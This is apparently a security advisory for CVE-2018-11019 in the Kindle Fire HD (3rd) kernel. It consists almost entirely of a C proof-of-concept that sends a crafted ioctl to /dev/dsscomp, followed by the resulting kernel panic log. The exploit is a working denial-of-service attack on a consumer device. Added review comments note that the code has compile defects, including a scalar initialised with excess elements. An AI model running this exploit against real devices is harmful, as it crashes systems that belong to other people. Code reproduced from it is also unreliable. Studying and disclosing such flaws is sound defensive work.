
CVE-2018-11019 Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞/zh-cn


漏洞影响

Fire OS 4.5.5.3

POC

/*
 * This is a PoC for the Kindle Fire HD (3rd).
 * A bug in the ioctl interface of the device file /dev/dsscomp causes a system crash via IOCTL 1118064517.
 * The related buggy struct name is dsscomp_setup_dispc_data.
 * This PoC must run with permission to perform ioctl on /dev/dsscomp.
 *
 * The following is the kmsg output of the kernel crash:
 *
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

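/* Character device the PoC talks to (see the kmsg excerpt below the listing). */
static const char *driver = "/dev/dsscomp";

/*
 * ioctl request number from the advisory: 1118064517 == 0x42a44f85.
 * Declared with an explicit unsigned int type: the original relied on
 * implicit int, which C99 removed (GCC warns, newer compilers reject), and
 * main() prints it with "%x", which expects an unsigned int.
 *
 * NOTE(review): read with Linux's generic _IOC encoding this is a
 * write-direction request with type 'O' (0x4f), nr 0x85 and an argument
 * size of 0x2a4 (676) bytes.  The page itself does not decode the number;
 * confirm against the driver's header before relying on that reading.
 */
static unsigned int command = 1118064517u;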

/*
 * Entry point of the PoC.
 *
 * Opens the dsscomp device read/write and issues the ioctl request
 * `command` with the address of `payload` as its argument.  The kmsg
 * excerpt below the listing shows the kernel taking a NULL-based
 * pointer dereference inside dev_ioctl while servicing this request
 * from a process named gcioctl_poc.
 *
 * argc, argv and env are unused.  Returns 0 after the ioctl returns, -1
 * if the device cannot be opened or the ioctl fails; on the reported
 * device the ioctl does not return because the kernel panics.
 *
 * Review notes (code left exactly as on the page):
 *  - system() and close() are called without <stdlib.h> / <unistd.h>,
 *    i.e. as implicit declarations; C99 and later compilers warn on or
 *    reject this.
 *  - fd is not closed on the ioctl-failure path; harmless only because
 *    the process exits immediately.
 */
int main(int argc, char **argv, char **env) {
    /*
     * NOTE(review): payload is declared as a scalar, not an array, so only
     * the first brace element initialises it; the remaining elements are
     * "excess elements in scalar initializer" and produce a compile-time
     * diagnostic.  How many bytes the kernel actually read from this
     * address is not established by the page.
     */
    unsigned int payload = {
    0xffffffff,
    0x00000003,
    0x5d200040,
    0x79900008,
    0x8f5928bd,
    0x78b02422,
    0x00000000,
    0xffffffff,
    0xf4c50400,
    0x007fffff,
    0x8499f562,
    0xffff0400,
    0x001b131d,
    0x60818210,
    0x00000007,
    0xffffffff,
    0x00000000,
    0x9da9041c,
    0xcd980400,
    0x001f03f4,
    0x00000007,
    0x2a34003f,
    0x7c80d8f3,
    0x63102627,
    0xc73643a8,
    0xa28f0665,
    0x00000000,
    0x689e57b4,
    0x01ff0008,
    0x5e7324b1,
    0xae3b003f,
    0x0b174d86,
    0x00000400,
    0x21ffff37,
    0xceb367a4,
    0x00000040,
    0x00000001,
    0xec000f9e,
    0x00000001,
    0x000001ff,
    0x00000000,
    0x00000000,
    0x0000000f,
    0x0425c069,
    0x038cc3be,
    0x0000000f,
    0x00000080,
    0xe5790100,
    0x5b1bffff,
    0x0000d355,
    0x0000c685,
    0xa0070000,
    0x0010ffff,
    0x00a0ff00,
    0x00000001,
    0xff490700,
    0x0832ad03,
    0x00000006,
    0x00000002,
    0x00000001,
    0x81f871c0,
    0x738019cb,
    0xbf47ffff,
    0x00000040,
    0x00000001,
    0x7f190f33,
    0x00000001,
    0x8295769b,
    0x0000003f,
    0x869f2295,
    0xffffffff,
    0xd673914f,
    0x05055800,
    0xed69b7d5,
    0x00000000,
    0x0107ebbd,
    0xd214af8d,
    0xffff4a93,
    0x26450008,
    0x58df0000,
    0xd16db084,
    0x03ff30dd,
    0x00000001,
    0x209aff3b,
    0xe7850800,
    0x00000002,
    0x30da815c,
    0x426f5105,
    0x0de109d7,
    0x2c1a65fc,
    0xfcb3d75f,
    0x00000000,
    0x00000001,
    0x8066be5b,
    0x00000002,
    0xffffffff,
    0x5cf232ec,
    0x680d1469,
    0x00000001,
    0x00000020,
    0xffffffff,
    0x00000400,
    0xd1d12be8,
    0x02010200,
    0x01ffc16f,
    0xf6e237e6,
    0x007f0000,
    0x01ff08f8,
    0x000f00f9,
    0xbad07695,
    0x00000000,
    0xbaff0000,
    0x24040040,
    0x00000006,
    0x00000004,
    0x00000000,
    0xbc2e9242,
    0x009f5f08,
    0x00800000,
    0x00000000,
    0x00000001,
    0xff8800ff,
    0x00000001,
    0x00000000,
    0x000003f4,
    0x6faa8472,
    0x00000400,
    0xec857dd5,
    0x00000000,
    0x00000040,
    0xffffffff,
    0x3f004874,
    0x0000b77a,
    0xec9acb95,
    0xfacc0001,
    0xffff0001,
    0x0080ffff,
    0x3600ff03,
    0x00000001,
    0x8fff7d7f,
    0x6b87075a,
    0x00000000,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,
    0x001001ff,
    0x00000000,
    0x00000001,
    0xff1f0512,
    0x00000001,
    0x51e32167,
    0xc18c55cc,
    0x00000000,
    0xffffffff,
    0xb4aaf12b,
    0x86edfdbd,
    0x00000010,
    0x0000003f,
    0xabff7b00,
    0xffff9ea3,
    0xb28e0040,
    0x000fffff,
    0x458603f4,
    0xffff007f,
    0xa9030f02,
    0x00000001,
    0x002cffff,
    0x9e00cdff,
    0x00000004,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141 };

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            /* Progress marker for whoever collects the device's log;
             * system() is used here without <stdlib.h>. */
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }

        /* "%x" expects an unsigned int; check that the declared type of
         * `command` matches (on the page it relies on implicit int). */
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        /* On the reported device this call does not return: the kmsg
         * below ends in "Kernel panic - not syncing" followed by a restart.
         * The failure message is the page's wording; an ioctl error does
         * not necessarily mean an allocation failed. */
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        /* close() is used without <unistd.h> (implicit declaration). */
        close(fd);
        return 0;
}
崩溃日志
  164.793151 Unable to handle kernel NULL pointer dereference at virtual address 00000037
  164.802459 pgd = c26ec000
  164.805664 00000037 *pgd=82f42831, *pte=00000000, *ppte=00000000
  164.813415 Internal error: Oops: 17 #1 PREEMPT SMP ARM
  164.819458 Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
  164.827239 CPU: 1    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
  164.834686 PC is at dev_ioctl+0x4ac/0x10c4
  164.839416 LR is at down_timeout+0x40/0x5c
  164.844146 pc : <c03178e8>    lr : <c006e9b8>    psr: 60000013
  164.844146 sp : c25a1e70  ip : c25a1e50  fp : c25a1f04
  164.857116 r10: 00000000  r9 : d8c0aca8  r8 : bed5c610
  164.863128 r7 : c0a25b50  r6 : c25a0000  r5 : bed5c610  r4 : 0000000f
  164.870391 r3 : 00001403  r2 : 00000000  r1 : 20000013  r0 : 00000000
  164.877807 Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
  164.885894 Control: 10c5387d  Table: 826ec04a  DAC: 00000015
  164.892303 
  164.892333 PC: 0xc0317868:
  164.897308 7868  30d22003 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f
  164.907989 7888  e3c6603f e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064
  164.918670 78a8  e1a01005 e3a02008 e50b3088 e1a00003 ebfcfa5f e3500000 1a00001e e51b4060
  164.929351 78c8  e3020710 e59f7bdc ebf4db32 e1a01000 e2870038 ebf55c25 e3500000 1a0002e0
  164.939880 78e8  e5943028 e1a08000 e5940024 e1a02007 e2841024 e5803004 e5830000 e5b23070
  164.950561 7908  e5871070 e2420038 e5831004 e5843024 e5842028 ebf55bb9 e50b8060 e50b8064
  164.961212 7928  ea000006 e24b1064 e50b1088 e51b0088 e3a01008 ebfd0387 e3a03004 e50b3064
  164.971771 7948  e5963008 e2952008 30d22003 33a03000 e3530000 1affffc5 e1a00005 e51b1088
  164.982299 
  164.982330 LR: 0xc006e938:
  164.987426 e938  e1a01000 0a000007 e3a05000 e2433001 e5843008 e1a00004 eb18d7ad e1a00005
  164.997955 e958  e24bd014 e89da830 e1a00004 e50b1018 eb18d135 e51b1018 e1a05000 eafffff4
  165.008636 e978  e1a0c00d e92dd878 e24cb004 e1a04000 e1a05001 eb18d91b e5943008 e3530000
  165.019317 e998  e1a06000 0a000007 e3a05000 e2433001 e5843008 e1a00004 e1a01006 eb18d794
  165.029846 e9b8  e1a00005 e89da878 e1a01005 e1a00004 eb18d158 e1a05000 eafffff5 e1a0c00d
  165.040374 e9d8  e92dd800 e24cb004 e5903000 e1a0c000 e3530000 0a00000b e5910008 e5932008
  165.051055 e9f8  e1500002 da000003 ea000006 e5932008 e1520000 ba000003 e283c004 e5933004
  165.061737 ea18  e3530000 1afffff8 e5813004 f57ff05f e3a00000 e58c1000 e89da800 e1a0c00d
  165.072265 
  165.072265 SP: 0xc25a1df0:
  165.077362 1df0  00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
  165.087890 1e10  c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
  165.098419 1e30  00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
  165.109100 1e50  00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
  165.119781 1e70  00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
  165.130340 1e90  0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
  165.141021 1eb0  00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
  165.151702 1ed0  c25a1efc c25a1ee0 c02089fc 00000000 c719ab40 00000004 c719ab40 bed5c610
  165.162353 
  165.162384 IP: 0xc25a1dd0:
  165.167327 1dd0  c0070df8 c00795ac c25a0000 00000001 00000004 d454d0f4 60000013 00000001
  165.178009 1df0  00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
  165.188537 1e10  c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
  165.199249 1e30  00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
  165.209899 1e50  00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
  165.220581 1e70  00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
  165.231109 1e90  0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
  165.241790 1eb0  00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
  165.252441 
  165.252441 FP: 0xc25a1e84:
  165.257415 1e84  c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff
  165.268066 1ea4  0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14 00000000
  165.278717 1ec4  00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40
  165.289276 1ee4  00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08 c0136044
  165.299926 1f04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
  165.310607 1f24  c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004 c25a0000
  165.321136 1f44  00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004 c25a0000
  165.331695 1f64  00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000 00000400
  165.342346 
  165.342376 R6: 0xc259ff80:
  165.347320 ff80  00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
  165.358001 ffa0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
  165.368682 ffc0  00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
  165.379241 ffe0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
  165.389770 0000  00000000 00000002 00000000 d72b0980 c0a0e840 00000001 00000015 c265dc00
  165.400451 0020  00000000 c25a0000 c09ddc50 d72b0980 de949300 c1620b40 c25a1b7c c25a1ac8
  165.411132 0040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
  165.421661 0060  005634c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
  165.432342 
  165.432342 R7: 0xc0a25ad0:
  165.437316 5ad0  00010105 01010005 01040901 00040001 ffff0101 00000000 00000000 00040b03
  165.447875 5af0  01040101 ffff0100 00000000 00000000 0000ffff 00000000 0e0c0000 01010005
  165.458526 5b10  01000105 0000ffff 00000000 0e0c0000 01010005 00000105 01040901 00040001
  165.469207 5b30  ffff0101 00000000 00000000 00040b03 01040101 3f3f0100 00010001 01000001
  165.479736 5b50  00000000 00000000 00000001 c0a25b5c c0a25b5c c0a25b64 c0a25b64 00000000
  165.490417 5b70  00000000 00000001 c0a25b78 c0a25b78 c0a25b80 c0a25b80 00000000 00000000
  165.500946 5b90  00000000 c0a25b94 c0a25b94 c0a25b9c c0a25b9c 00000000 00000000 00000001
  165.511627 5bb0  c0a25bb0 c0a25bb0 c0a25bb8 c0a25bb8 c0a25bc0 c0a25bc0 c0a25bc8 c0a25bc8
  165.522186 
  165.522186 R9: 0xd8c0ac28:
  165.527282 ac28  d8c0ac28 d8c0ac28 00000000 00000000 00000000 c06bc674 000200da c09dda58
  165.537841 ac48  00000000 00000000 d8c0ac50 d8c0ac50 00000000 c0aa5174 c0aa5174 c0aa5148
  165.548492 ac68  5aefbbda 00000000 00000000 00000000 d8c0ac80 00000000 00000000 00000000
  165.559020 ac88  00200000 00000000 00000000 d8c0ac94 d8c0ac94 dd3f6080 dd3f6080 00000000
  165.569702 aca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
  165.580261 acc8  d8c0ad80 dd3ede70 00001064 00000001 0fb00000 5aefbbda 2e19b832 5aefbbda
  165.590911 ace8  2e19b832 5aefbbda 2e19b832 00000000 00000000 00000000 00000000 00000000
  165.601593 ad08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0ad24
  165.612121 Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
  165.619445 Stack: (0xc25a1e70 to 0xc25a2000)
  165.624359 1e60:                                     00000001 00000028 000fffff c25a1ea0
  165.633605 1e80: c25a1edc c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8
  165.642822 1ea0: ffffffff 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14
  165.652038 1ec0: 00000000 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000
  165.661102 1ee0: c719ab40 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08
  165.670318 1f00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
  165.679565 1f20: dcf8c440 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004
  165.688781 1f40: c25a0000 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004
  165.697875 1f60: c25a0000 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000
  165.707092 1f80: 00000400 bed5c638 00010e64 00000000 00000036 c0013e08 00000000 c25a1fa8
  165.716308 1fa0: c0013c60 c0136578 bed5c638 00010e64 00000004 c0085d9e bed5c610 bed5c610
  165.725402 1fc0: bed5c638 00010e64 00000000 00000036 00000000 00000000 00000000 bed5c624
  165.734619 1fe0: 00000000 bed5c5f4 000106a4 0002918c 60000010 00000004 00000000 00000000
  165.743835 Backtrace: 
  165.746856 <c031743c> (dev_ioctl+0x0/0x10c4) from <c0136044> (do_vfs_ioctl+0x8c/0x5b4)
  165.756256 <c0135fb8> (do_vfs_ioctl+0x0/0x5b4) from <c01365e0> (sys_ioctl+0x74/0x84)
  165.765502 <c013656c> (sys_ioctl+0x0/0x84) from <c0013c60> (ret_fast_syscall+0x0/0x30)
  165.774780  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638
  165.783203 Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028) 
  165.793060 Board Information: 
  165.793060  Revision : 0001
  165.793060  Serial    : 0000000000000000
  165.793090 SoC Information:
  165.793090  CPU    : OMAP4470
  165.793090  Rev    : ES1.0
  165.793121  Type    : HS
  165.793121  Production ID: 0002B975-000000CC
  165.793121  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
  165.793121 
  165.844757 --- end trace aba846a2af6e75b7 ---
  165.850097 Kernel panic - not syncing: Fatal exception
  165.856109 CPU0: stopping
  165.859252 Backtrace: 
  165.862274 <c0018148> (dump_backtrace+0x0/0x10c) from <c0698bb8> (dump_stack+0x18/0x1c)
  165.871643  r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
  165.878784 <c0698ba0> (dump_stack+0x0/0x1c) from <c0019bd8> (handle_IPI+0x190/0x1c4)
  165.887908 <c0019a48> (handle_IPI+0x0/0x1c4) from <c00084fc> (gic_handle_irq+0x58/0x60)
  165.897399 <c00084a4> (gic_handle_irq+0x0/0x60) from <c06a5380> (__irq_svc+0x40/0x70)
  165.906707 Exception stack(0xd8dcfc38 to 0xd8dcfc80)
  165.912384 fc20:                                                       c153a9f8 00000000
  165.921600 fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f
  165.930816 fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff
  165.940032  r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4
  165.947052 <c010a534> (follow_page+0x0/0x238) from <c010af94> (__get_user_pages+0x13c/0x3f0)
  165.957031 <c010ae58> (__get_user_pages+0x0/0x3f0) from <c010b350> (get_user_pages+0x50/0x58)
  165.967102 <c010b300> (get_user_pages+0x0/0x58) from <c00ff544> (get_user_pages_fast+0x64/0x7c)
  165.977233  r4:d8caee3c
  165.980468 <c00ff4e0> (get_user_pages_fast+0x0/0x7c) from <c01eeff0> (fuse_copy_fill+0x1bc/0x238)
  165.990905 <c01eee34> (fuse_copy_fill+0x0/0x238) from <c01ef0a4> (fuse_copy_one+0x38/0x68)
  166.000579  r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000
  166.007690 <c01ef06c> (fuse_copy_one+0x0/0x68) from <c01efe64> (fuse_dev_do_read+0x3e4/0x69c)
  166.017761  r4:dd243c00
  166.020874 <c01efa80> (fuse_dev_do_read+0x0/0x69c) from <c01f03c0> (fuse_dev_read+0x84/0x9c)
  166.030853 <c01f033c> (fuse_dev_read+0x0/0x9c) from <c0124ecc> (do_sync_read+0xb0/0xf0)
  166.040222  r7:00000000 r6:00000000 r5:00000000 r4:00000000
  166.047363 <c0124e1c> (do_sync_read+0x0/0xf0) from <c01258f4> (vfs_read+0xa4/0x148)
  166.056488 <c0125850> (vfs_read+0x0/0x148) from <c01259d8> (sys_read+0x40/0x78)
  166.065093  r8:00040050 r7:b6eaf010 r6:d8e08900 r5:00000000 r4:00000000
  166.073547 <c0125998> (sys_read+0x0/0x78) from <c0013c60> (ret_fast_syscall+0x0/0x30)
  166.082855  r8:c0013e08 r7:00000003 r6:b6eaf008 r5:b73828a0 r4:b6eaf010
  166.091217 CPU0 PC (0) : 0xc0019b2c
  166.095397 CPU0 PC (1) : 0xc0019b2c
  166.099456 CPU0 PC (2) : 0xc0019b2c
  166.103515 CPU0 PC (3) : 0xc0019b2c
  166.107574 CPU0 PC (4) : 0xc0019b2c
  166.111785 CPU0 PC (5) : 0xc0019b2c
  166.115814 CPU0 PC (6) : 0xc0019b2c
  166.119873 CPU0 PC (7) : 0xc0019b2c
  166.124084 CPU0 PC (8) : 0xc0019b2c
  166.128112 CPU0 PC (9) : 0xc0019b2c
  166.132171 CPU1 PC (0) : 0xc003ee38
  166.136352 CPU1 PC (1) : 0xc003ee54
  166.140411 CPU1 PC (2) : 0xc003ee54
  166.144470 CPU1 PC (3) : 0xc003ee54
  166.148681 CPU1 PC (4) : 0xc003ee54
  166.152709 CPU1 PC (5) : 0xc003ee54
  166.156768 CPU1 PC (6) : 0xc003ee54
  166.160980 CPU1 PC (7) : 0xc003ee54
  166.165008 CPU1 PC (8) : 0xc003ee54
  166.169067 CPU1 PC (9) : 0xc003ee54
  166.173126 
  166.175048 Restarting Linux version 3.4.83-gd2afc0bae69 (email protected) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
  166.175079
